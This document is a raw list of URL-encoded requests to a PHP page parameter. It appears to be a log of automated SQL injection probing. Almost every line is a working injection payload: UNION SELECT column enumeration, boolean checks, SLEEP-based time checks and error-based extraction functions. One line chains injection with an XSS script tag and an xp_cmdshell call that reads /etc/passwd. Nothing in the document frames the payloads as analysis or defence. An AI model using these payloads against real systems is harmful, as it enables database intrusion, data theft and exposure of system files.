/test/website/post.php?page=1%29%29%20AS%20arNq%20WHERE%203207%3D3207%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20KNiT
/test/website/post.php?page=-8216%25%22%29%29%29%20UNION%20ALL%20SELECT%207649%2C7649--%20QYsI
/test/website/post.php?page=-5323%22%29%20UNION%20ALL%20SELECT%208567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567--%20cUSe
/test/website/post.php?page=1%3BSELECT%20%28CASE%20WHEN%20%284414%3D3703%29%20THEN%204414%20ELSE%204414%2A%28SELECT%204414%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%27%29%20AS%20gZqF%20WHERE%201619%3D1619%20AND%20SLEEP%285%29%23
/test/website/post.php?page=1%27%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%27iXyr%27%3D%27iXyr
/test/website/post.php?page=1%29%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%284258%3D4258
/test/website/post.php?page=1%27%29%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%28%28%27oXYK%27%3D%27oXYK
/test/website/post.php?page=1%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22xveu%22%3D%22xveu
/test/website/post.php?page=1%27%29%20AND%20ROW%286887%2C7898%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286887%3D6887%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209578%20UNION%20SELECT%204916%20UNION%20SELECT%206664%20UNION%20SELECT%206501%29a%20GROUP%20BY%20x%29%20AND%20%28%27TwjM%27%20LIKE%20%27TwjM
/test/website/post.php?page=1%29%20AND%206804%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286804%3D6804%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%289799%3D9799
/test/website/post.php?page=1%22%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22rQVT%22%3D%22rQVT
/test/website/post.php?page=1%22%29%29%3BSELECT%20%28CASE%20WHEN%20%281034%3D1034%29%20THEN%201034%20ELSE%201034%2A%28SELECT%201034%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20sQDg
/test/website/post.php?page=-1523%25%27%29%20UNION%20ALL%20SELECT%207160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160--%20mcBV
/test/website/post.php?page=1%27%2B%28SELECT%20fvYu%20WHERE%206768%3D6768%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=-3360%27%29%20AS%20kRoR%20WHERE%202220%3D2220%20UNION%20ALL%20SELECT%202220%2C2220%2C2220%2C2220%2C2220--%20UHuy
/test/website/post.php?page=1%22%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29--%20KIfo
/test/website/post.php?page=1%29%20AND%206235%3D6235%20AND%20%288237%3D8237
/test/website/post.php?page=1%25%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20YVDE
/test/website/post.php?page=1%27%29%29%20AND%201302%3D1302--%20LRhL
/test/website/post.php?page=1%25%27%29%29%29%20AND%209936%3D3963%23
/test/website/post.php?page=1%27%29%29%20AS%20CSpw%20WHERE%202207%3D2207%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29--%20yBwD
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20LCFt
/test/website/post.php?page=1%27%29%29%20AS%20Uobp%20WHERE%202197%3D2197%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%289637%3D9997%29%20THEN%201%20ELSE%200x28%20END%29%29--%20MMjG
/test/website/post.php?page=1%60%29%20WHERE%209435%3D9435%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PizL
/test/website/post.php?page=1%22%29%29%29%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%28%28%28%22OEBc%22%3D%22OEBc
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20WjTy
/test/website/post.php?page=EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%281258%3D1258%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29
/test/website/post.php?page=-4778%60%20WHERE%204017%3D4017%20UNION%20ALL%20SELECT%204017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017%2C4017--%20fBIv
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20UeMV
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cRAk
/test/website/post.php?page=1%25%27%20AND%20%281712%3D3995%29%2A3995%20AND%20%27%25%27%3D%27
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20UxoF
/test/website/post.php?page=1%27%2B%28SELECT%20AbbB%20WHERE%203856%3D3856%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29SLqO%29%23
/test/website/post.php?page=1%25%27%20AND%206235%3D6235%20AND%20%27%25%27%3D%27
/test/website/post.php?page=1%25%27%20AND%207328%3D6341--%20YYCL
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZIiB
/test/website/post.php?page=1%27%20WHERE%209785%3D9785%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20QcbK
/test/website/post.php?page=-9563%22%29%29%20AS%20nggC%20WHERE%206896%3D6896%20UNION%20ALL%20SELECT%206896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896%2C6896--%20jCxR
/test/website/post.php?page=-2674%25%27%29%29%29%20UNION%20ALL%20SELECT%207484--%20pLpn
/test/website/post.php?page=1%27%29%29%20AS%20YpFc%20WHERE%201853%3D1853%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VKWU%29%23
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20rzKg
/test/website/post.php?page=-7539%25%22%29%29%29%20UNION%20ALL%20SELECT%205760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760%2C5760--%20YsZJ
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%23
/test/website/post.php?page=1%22%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ppSD%29%23
/test/website/post.php?page=-9284%22%29%20UNION%20ALL%20SELECT%201574--%20ClIA
/test/website/post.php?page=1%27%29%20AS%20riOJ%20WHERE%205791%3D5791%20AND%205432%3D5583%23
/test/website/post.php?page=-9413%25%27%29%29%29%20UNION%20ALL%20SELECT%209329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329--%20NGIV
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Kzzf
/test/website/post.php?page=1%22%29%20AS%20pWuZ%20WHERE%208331%3D8331%20RLIKE%20SLEEP%285%29--%20fkiA
/test/website/post.php?page=1%25%27%20AND%208820%3D8820%23
/test/website/post.php?page=1%27%29%20WHERE%204679%3D4679%20AND%207933%3D8054--%20iLVe
/test/website/post.php?page=1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20aGgj
/test/website/post.php?page=1%27%29%20AND%201635%3D1311%20AND%20%28%27FWzg%27%20LIKE%20%27FWzg
/test/website/post.php?page=-3453%25%22%20UNION%20ALL%20SELECT%204137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137--%20JQPP
/test/website/post.php?page=MAKE_SET%283276%3D3276%2CSLEEP%285%29%29
/test/website/post.php?page=1%22%29%29%20AS%20vWrd%20WHERE%203001%3D3001%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20pxsl
/test/website/post.php?page=1%22%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%22kJZK%22%3D%22kJZK
/test/website/post.php?page=1%27%29%29%29%3BSELECT%20%28CASE%20WHEN%20%281034%3D1034%29%20THEN%201034%20ELSE%201034%2A%28SELECT%201034%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20NiyZ
/test/website/post.php?page=1%25%22%20AND%201101%3D1101%23
/test/website/post.php?page=1%29%29%29%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%289146%3D9146
/test/website/post.php?page=1%29%20AND%203579%3D9209%23
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20oViI
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20iypx
/test/website/post.php?page=1%29%20AND%20MAKE_SET%287623%3D1511%2C1511%29--%20vGPa
/test/website/post.php?page=1%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20kOqi
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20GeCx
/test/website/post.php?page=1%22%29%29%20AND%20ELT%288355%3D8355%2CSLEEP%285%29%29%23
/test/website/post.php?page=1%25%22%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%22%25%22%3D%22
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OISu
/test/website/post.php?page=1%27%20AND%202989%3D7094%20AND%20%27DcYw%27%3D%27DcYw
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%27%29%20AS%20JShR%20WHERE%205413%3D5413%20RLIKE%20SLEEP%285%29--%20fWVA
/test/website/post.php?page=1&BFbQ%3D7882%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23
/test/website/post.php?page=1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20EPeC
/test/website/post.php?page=1%27%20WHERE%201722%3D1722%20AND%208363%3D3609--%20asRc
/test/website/post.php?page=-2773%27%20UNION%20ALL%20SELECT%206674--%20eeES
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20fZoI
/test/website/post.php?page=-5808%25%22%20UNION%20ALL%20SELECT%209173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173%2C9173--%20wQOb
/test/website/post.php?page=1%25%22%29%29%20AND%207697%3D7697%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=-6603%22%29%29%29%20UNION%20ALL%20SELECT%203390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390--%20hQHk
/test/website/post.php?page=1%27%29%29%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%28%28%28%27yNCD%27%20LIKE%20%27yNCD
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20eRzo
/test/website/post.php?page=1%22%29%20AS%20okZb%20WHERE%201573%3D1573%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29--%20dXoP
/test/website/post.php?page=-4713%27%29%29%20UNION%20ALL%20SELECT%206293%2C6293%2C6293%2C6293%2C6293--%20lYdY
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20sJtS
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20flCX
/test/website/post.php?page=1%22%29%29%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%28%28%28%22imVx%22%20LIKE%20%22imVx
/test/website/post.php?page=1%27%29%29%20AND%209467%3D9467--%20sEmD
/test/website/post.php?page=1%29%20WHERE%203811%3D3811%20AND%207697%3D7697--%20bFyZ
/test/website/post.php?page=1%25%27%20AND%203952%3D3952%20AND%20%27%25%27%3D%27
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%23
/test/website/post.php?page=-4716%60%29%20WHERE%207753%3D7753%20UNION%20ALL%20SELECT%207753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753--%20OgVa
/test/website/post.php?page=-2174%27%20UNION%20ALL%20SELECT%209214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214--%20EERE
/test/website/post.php?page=1%29%29%20AS%20YWIx%20WHERE%201085%3D1085%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29--%20edIv
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20cWac
/test/website/post.php?page=-2809%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203512--%20GtEU
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20oLUH
/test/website/post.php?page=1%27%29%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%28%27sAZw%27%3D%27sAZw
/test/website/post.php?page=-9798%22%20UNION%20ALL%20SELECT%204227--%20vIIm
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PrSv
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL--%20oRYB
/test/website/post.php?page=-6503%22%29%29%29%20UNION%20ALL%20SELECT%205223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223--%20LoFm
/test/website/post.php?page=1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27CVOa%27%3D%27CVOa
/test/website/post.php?page=1%25%22%29%20AND%207050%3D4421--%20XdGB
/test/website/post.php?page=1%27%20WHERE%207129%3D7129%20AND%208182%3D2129--%20gqjn
/test/website/post.php?page=-5819%29%20UNION%20ALL%20SELECT%202388%2C2388%2C2388%2C2388%2C2388--%20KeTS
/test/website/post.php?page=-7058%60%29%20WHERE%202395%3D2395%20UNION%20ALL%20SELECT%202395%2C2395--%20rfek
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL--%20HxcG
/test/website/post.php?page=-1458%20UNION%20ALL%20SELECT%203779%2C3779--%20CTdU
/test/website/post.php?page=-2823%22%29%29%20AS%20DXZc%20WHERE%202670%3D2670%20UNION%20ALL%20SELECT%202670%2C2670%2C2670%2C2670%2C2670--%20IOZz
/test/website/post.php?page=1%20AND%202936%3D%28SELECT%202936%20FROM%20PG_SLEEP%285%29%29
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20EeDD
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20aXGf
/test/website/post.php?page=1%25%27%29%20AND%20ELT%283734%3D3734%2C7834%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=1%25%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27%25%27%3D%27
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20xFnu
/test/website/post.php?page=1%27%29%29%29%20AND%207870%3D7870%20AND%20%28%28%28%27VcXN%27%20LIKE%20%27VcXN
/test/website/post.php?page=1%27%29%20AS%20xlPq%20WHERE%205980%3D5980%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20KDDW
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cblt
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20HbEA
/test/website/post.php?page=1%27%29%20ORDER%20BY%205682--%20KQtP
/test/website/post.php?page=1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20qplj
/test/website/post.php?page=-3098%29%20UNION%20ALL%20SELECT%209015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015--%20gDDS
/test/website/post.php?page=1%27%2B%28SELECT%20suLO%20WHERE%208855%3D8855%3BSELECT%20%28CASE%20WHEN%20%286976%3D1592%29%20THEN%206976%20ELSE%206976%2A%28SELECT%206976%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%22%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29%20AND%20%22Rztc%22%20LIKE%20%22Rztc
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20UDGt
/test/website/post.php?page=-8952%27%29%20UNION%20ALL%20SELECT%204158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158--%20SkoY
/test/website/post.php?page=1%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29--%20Vxpz
/test/website/post.php?page=1%27%29%20WHERE%208365%3D8365%20AND%20SLEEP%285%29%23
/test/website/post.php?page=1%60%20WHERE%203724%3D3724%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29SLqO%29%23
/test/website/post.php?page=-3828%22%29%20UNION%20ALL%20SELECT%203269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269--%20YGVZ
/test/website/post.php?page=1%25%27%29%29%20AND%201770%3D1555%20AND%20%28%28%27%25%27%3D%27
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20qQLg
/test/website/post.php?page=1%29%20AS%20YYgF%20WHERE%201625%3D1625%20RLIKE%20SLEEP%285%29--%20lDlD
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23
/test/website/post.php?page=-5301%29%20AS%20hdSJ%20WHERE%203009%3D3009%20UNION%20ALL%20SELECT%203009%2C3009%2C3009%2C3009--%20dGBq
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZbIV
/test/website/post.php?page=1%27%29%20AND%202103%3D3189%20AND%20%28%27LzAh%27%20LIKE%20%27LzAh
/test/website/post.php?page=-2666%22%29%29%20AS%20SerM%20WHERE%209429%3D9429%20UNION%20ALL%20SELECT%209429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429--%20jXBr
/test/website/post.php?page=1%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VKWU%29%23
/test/website/post.php?page=1%27%29%20AS%20kIyb%20WHERE%205200%3D5200%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29--%20vysr
/test/website/post.php?page=-8764%27%29%29%20UNION%20ALL%20SELECT%201718%2C1718--%20hbON
/test/website/post.php?page=1%29%29%20AS%20hWJe%20WHERE%202600%3D2600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20DkXt
/test/website/post.php?page=1%22%29%20AS%20MTMA%20WHERE%202664%3D2664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20XRZQ
